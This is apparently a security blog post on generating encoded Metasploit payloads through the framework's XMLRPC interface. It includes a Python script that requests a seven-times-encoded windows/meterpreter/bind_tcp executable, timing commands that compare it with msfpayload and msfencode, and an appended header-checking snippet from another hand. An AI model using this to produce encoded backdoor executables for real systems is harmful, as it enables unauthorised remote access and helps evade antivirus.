Blog.HappyPacket.net

Security Notes, News, and Thoughts

Fun with Metasploit payload generation

Tonight has been fun; I have been learning more about how payloads are generated inside Metasploit. My goal was to figure out how to add the msfencode functionality into the generate_simple function that is used by both XMLRPC and the console, so that you can encode payloads and all that fun stuff from within Metasploit. I think I have it working now, and once Metasploit is loaded there seems to be a significant speed difference. Here is what I found:

I wrote a quick XMLRPC test to get an executable payload from Metasploit, encoding it 7 times with whatever encoder it thinks is best. The code I'm using hasn't been committed or submitted yet, but if you want to test it I can provide you a patch until I'm happy enough with it to submit it.


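import sys
import xmlrpclib
import binascii

# Metasploit XMLRPC service on the local machine (Python 2 script)
proxy = xmlrpclib.ServerProxy("http://localhost:55553")

# Authenticate and keep the session token for later calls
ret = proxy.auth.login("msf","abc123")
if ret['result'] == 'success':
    token = ret['token']
else:
    print "Could not login\n"
    sys.exit(1)  # no token, so nothing below can work

# Ask for an exe, encoded 7 times, forcing the encoder to run
opts = {
    "Format" : 'exe',
    "Iterations" : 7,
    "ForceEncode" : True}

ret = proxy.module.execute(token,"payload","windows/meterpreter/bind_tcp",opts)
if ret['result'] == 'success':
    # The payload comes back hex-encoded; write the raw bytes without a trailing newline
    sys.stdout.write(binascii.unhexlify(ret['payload']))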




Next, I decided to do a test of the XMLRPC way vs. the traditional way of doing it:


[email protected]:~/msfmods/py# time (python get_payload.py > /tmp/test3)

real 0m3.839s
user 0m0.020s
sys 0m0.043s
[email protected]:~/msfmods/py# time (~/metasploit/msfpayload windows/meterpreter/bind_tcp raw | ~/metasploit/msfencode -t exe -c 5 -o /tmp/test2 2>/dev/null )

real 0m10.548s
user 0m7.553s
sys 0m2.920s
[email protected]:~/msfmods/py# file /tmp/test2 /tmp/test3
/tmp/test2: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
/tmp/test3: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit




It definitely appears we have a speed increase, and with the additional overhead of an auth in the way, it's possible to take a little bit more time off of it. Being able to do this over XMLRPC hopefully will give a good way for folks to grab payloads remotely and easily for common tasks.
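
The post checks the result with file(1) after it has been written to disk. As an added example (not the author's code, and in Python 3 rather than the Python 2 of the script above), the same check can be made on the RPC response before anything is written. It assumes only the response shape shown in the post (a `result` field and a hex `payload` field); the function names and the sample bytes are constructed for illustration.

```python
import struct

I386 = 0x014C  # IMAGE_FILE_MACHINE_I386, the "Intel 80386" that file(1) reports

def decode_payload(ret):
    """Decode a response dict shaped like the post's and confirm it is a 32-bit PE.

    Returns the raw bytes; raises ValueError on a failed call or malformed data.
    """
    if not isinstance(ret, dict) or ret.get("result") != "success":
        raise ValueError("RPC call did not report success")
    try:
        data = bytes.fromhex(ret.get("payload", ""))
    except (ValueError, TypeError) as exc:
        raise ValueError("payload field is not valid hex") from exc
    # DOS header: 'MZ' magic, with e_lfanew (offset of the PE header) at 0x3C.
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # The 4-byte signature plus the 20-byte COFF header must fit in the buffer.
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    if machine != I386:
        raise ValueError("unexpected machine type 0x%04x" % machine)
    return data

def constructed_pe(machine=I386):
    """Constructed sample: the smallest header layout the checks accept (not a real exe)."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)  # e_lfanew points just past the DOS header
    coff = b"PE\0\0" + struct.pack("<H", machine) + b"\0" * 18
    return dos + coff

if __name__ == "__main__":
    sample = constructed_pe()
    ok = decode_payload({"result": "success", "payload": sample.hex()})
    print("accepted %d bytes" % len(ok))
    for bad in ({"result": "error"}, {"result": "success", "payload": "zz"}):
        try:
            decode_payload(bad)
        except ValueError as exc:
            print("rejected:", exc)
```
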

Have thoughts or suggestions?

Hit me up at sussurro [aT] happypacket DOT net
